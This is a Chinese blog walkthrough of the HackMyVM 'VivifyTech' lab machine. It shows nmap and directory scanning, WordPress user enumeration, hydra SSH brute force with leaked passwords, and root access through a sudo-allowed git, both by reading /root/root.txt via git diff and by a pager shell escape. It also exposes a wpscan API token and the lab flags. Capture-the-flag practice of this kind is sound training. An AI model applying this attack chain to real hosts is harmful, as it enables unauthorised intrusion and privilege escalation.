VivifyTech

⏲️ Release Date // 2023-12-28

✔️ MD5 // d8d796aa8ac7998128f555f3c61360a5

☠ Root // 115

💀 User // 112

主机探测和nmap扫描

主机探测

 nmap -sn 192.168.56.0/24

全端口扫描

 nmap -sT --min-rate 10000 -p- 192.168.56.126

 PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
3306/tcp  open  mysql
33060/tcp open  mysqlx

指定端口扫描（详细扫描）

 nmap -sT -sV -sC -O -p22,80,3306,33060 192.168.56.126

 PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
| ssh-hostkey: 
|   256 32:f3:f6:36:95:12:c8:18:f3:ad:b8:0f:04:4d:73:2f (ECDSA)
|_  256 1d:ec:9c:6e:3c:cf:83:f6:f0:45:22:58:13:2f:d3:9e (ED25519)
80/tcp    open  http    Apache httpd 2.4.57 ((Debian))
|_http-server-header: Apache/2.4.57 (Debian)
|_http-title: Apache2 Debian Default Page: It works
3306/tcp  open  mysql   MySQL (unauthorized)
33060/tcp open  mysqlx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: 
|     Invalid message"
|     HY000
|   LDAPBindReq: 
|     *Parse error unserializing protobuf message"
|     HY000
|   oracle-tns: 
|     Invalid message-frame."
|_    HY000

web渗透

访问web页面

apache默认页面

目录扫描

 gobuster dir -u http://192.168.56.126 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

扫到

 /wordpress            (Status: 301) [Size: 320] [--> http://192.168.56.126/wordpress/]
/server-status        (Status: 403) [Size: 279]

wordpress 6.4.1没啥利用的漏洞

利用wpscan

 wpscan --url http://192.168.56.126/wordpress/ --api-token aSaeIFrptoJuKIRRxPteXnJo7lZU8eDtJEKXxMV1RAw -e u

枚举一下用户

[+] sancelisso

dirb目录扫描

 dirb http://192.168.56.126 /usr/share/seclists/Discovery/Web-Content/common.txt

feroxbuster目录扫描

 feroxbuster -u http://192.168.56.126 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 5 --filter-status 404,403

wp-admin后台登录页面，没有弱密码

查看wp-includes目录

发现一个文件

http://192.168.56.126/wordpress/wp-includes/secrets.txt

 agonglo
tegbesou
paparazzi
womenintech
Password123

应该是密码

尝试后台爆破登录

 wpscan --url http://192.168.56.126/wordpress/ -U sancelisso -P pass

没有啥东西

尝试寻找更多信息

找到这篇文章

找到几个人名

sarah
mark
emily
jake
alex

再次尝试登录后台

 wpscan --url http://192.168.56.126/wordpress/ -U user -P pass

依旧没有结果

登录SSH服务

登录后台没结果，那就尝试ssh

 hydra -L user -P pass ssh://192.168.56.126

 [22][ssh] host: 192.168.56.126   login: sarah   password: bohicon

拿到一组凭据

sarah:bohicon

 sarah@VivifyTech:~$ ls -la
total 36
drwx------ 4 sarah sarah 4096 May 27 08:56 .
drwxr-xr-x 6 root  root  4096 Dec  5 16:00 ..
-rw------- 1 sarah sarah    0 Dec  5 17:53 .bash_history
-rw-r--r-- 1 sarah sarah  245 Dec  5 17:33 .bash_logout
-rw-r--r-- 1 sarah sarah 3565 Dec  5 17:48 .bashrc
-rw------- 1 sarah sarah    0 May 27 08:56 .history
drwxr-xr-x 3 sarah sarah 4096 Dec  5 16:19 .local
-rw------- 1 sarah sarah  104 May 27 08:32 .mysql_history
drwxr-xr-x 2 sarah sarah 4096 Dec  5 16:19 .private
-rw-r--r-- 1 sarah sarah  807 Dec  5 15:57 .profile
-rw-r--r-- 1 sarah sarah   27 Dec  5 16:22 user.txt
sarah@VivifyTech:~$ cat user.txt 
HMV{Y0u_G07_Th15_0ne_6543}
sarah@VivifyTech:~$ cd .private/
sarah@VivifyTech:~/.private$ ls
Tasks.txt
sarah@VivifyTech:~/.private$ cat Tasks.txt 
- Change the Design and architecture of the website
- Plan for an audit, it seems like our website is vulnerable
- Remind the team we need to schedule a party before going to holidays
- Give this cred to the new intern for some tasks assigned to him - gbodja:4Tch055ouy370N

又拿到另一凭据

gbodja:4Tch055ouy370N

提权

git提权

利用git的diff工具，查看root.txt(盲猜)

 gbodja@VivifyTech:~$ sudo -l
Matching Defaults entries for gbodja on VivifyTech:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, !admin_flag, use_pty
 
User gbodja may run the following commands on VivifyTech:
    (ALL) NOPASSWD: /usr/bin/git
gbodja@VivifyTech:~$ sudo git diff /dev/null /root/root.txt
diff --git a/root/root.txt b/root/root.txt
new file mode 100644
index 0000000..9b04236
--- /dev/null
+++ b/root/root.txt
@@ -0,0 +1 @@
+HMV{Y4NV!7Ch3N1N_Y0u_4r3_7h3_R007_8672}

利用git提权的root

 sudo git -p help config

之后输入!/bin/bash

 HMV{Y4NV!7Ch3N1N_Y0u_4r3_7h3_R007_8672}

拿到root.txt

上一篇Pwned

下一篇W1R3S: 1.0.1

本文作者：C0rr3ct

本文链接：https://www.cnblogs.com/C0rr3ct/p/18216604

posted @ 2024-05-27 21:42 C0rr3ct 阅读(39) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

相关博文：

· stars

· helium

· hackmyvm-VivifyTech

· [vulnhub]Prime1

· vulnhub之VulnHub2018_DeRPnStiNK

阅读排行：
· TypeScript + Deepseek 打造卜卦网站：技术与玄学的结合
· Manus的开源复刻OpenManus初探
· AI 智能体引爆开源社区「GitHub 热点速览」
· 从HTTP原因短语缺失研究HTTP/2和HTTP/3的设计差异
· 三行代码完成国际化适配，妙~啊~

C0rr3ct

VivifyTech

主机探测和nmap扫描

web渗透

目录扫描

利用wpscan

dirb目录扫描

feroxbuster目录扫描

登录SSH服务

提权

公告

常用链接

最新随笔

随笔分类

随笔档案

阅读排行榜

	PORT STATE SERVICE
	22/tcp open ssh
	80/tcp open http
	3306/tcp open mysql
	33060/tcp open mysqlx

	PORT STATE SERVICE VERSION
	22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
	\| ssh-hostkey:
	\| 256 32:f3:f6:36:95:12:c8:18:f3:ad:b8:0f:04:4d:73:2f (ECDSA)
	\|_ 256 1d:ec:9c:6e:3c:cf:83:f6:f0:45:22:58:13:2f:d3:9e (ED25519)
	80/tcp open http Apache httpd 2.4.57 ((Debian))
	\|_http-server-header: Apache/2.4.57 (Debian)
	\|_http-title: Apache2 Debian Default Page: It works
	3306/tcp open mysql MySQL (unauthorized)
	33060/tcp open mysqlx?
	\| fingerprint-strings:
	\| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
	\| Invalid message"
	\| HY000
	\| LDAPBindReq:
	\| *Parse error unserializing protobuf message"
	\| HY000
	\| oracle-tns:
	\| Invalid message-frame."
	\|_ HY000

	/wordpress (Status: 301) [Size: 320] [--> http://192.168.56.126/wordpress/]
	/server-status (Status: 403) [Size: 279]

	sarah@VivifyTech:~$ ls -la
	total 36
	drwx------ 4 sarah sarah 4096 May 27 08:56 .
	drwxr-xr-x 6 root root 4096 Dec 5 16:00 ..
	-rw------- 1 sarah sarah 0 Dec 5 17:53 .bash_history
	-rw-r--r-- 1 sarah sarah 245 Dec 5 17:33 .bash_logout
	-rw-r--r-- 1 sarah sarah 3565 Dec 5 17:48 .bashrc
	-rw------- 1 sarah sarah 0 May 27 08:56 .history
	drwxr-xr-x 3 sarah sarah 4096 Dec 5 16:19 .local
	-rw------- 1 sarah sarah 104 May 27 08:32 .mysql_history
	drwxr-xr-x 2 sarah sarah 4096 Dec 5 16:19 .private
	-rw-r--r-- 1 sarah sarah 807 Dec 5 15:57 .profile
	-rw-r--r-- 1 sarah sarah 27 Dec 5 16:22 user.txt
	sarah@VivifyTech:~$ cat user.txt
	HMV{Y0u_G07_Th15_0ne_6543}
	sarah@VivifyTech:~$ cd .private/
	sarah@VivifyTech:~/.private$ ls
	Tasks.txt
	sarah@VivifyTech:~/.private$ cat Tasks.txt
	- Change the Design and architecture of the website
	- Plan for an audit, it seems like our website is vulnerable
	- Remind the team we need to schedule a party before going to holidays
	- Give this cred to the new intern for some tasks assigned to him - gbodja:4Tch055ouy370N

	gbodja@VivifyTech:~$ sudo -l
	Matching Defaults entries for gbodja on VivifyTech:
	env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, !admin_flag, use_pty

	User gbodja may run the following commands on VivifyTech:
	(ALL) NOPASSWD: /usr/bin/git
	gbodja@VivifyTech:~$ sudo git diff /dev/null /root/root.txt
	diff --git a/root/root.txt b/root/root.txt
	new file mode 100644
	index 0000000..9b04236
	--- /dev/null
	+++ b/root/root.txt
	@@ -0,0 +1 @@
	+HMV{Y4NV!7Ch3N1N_Y0u_4r3_7h3_R007_8672}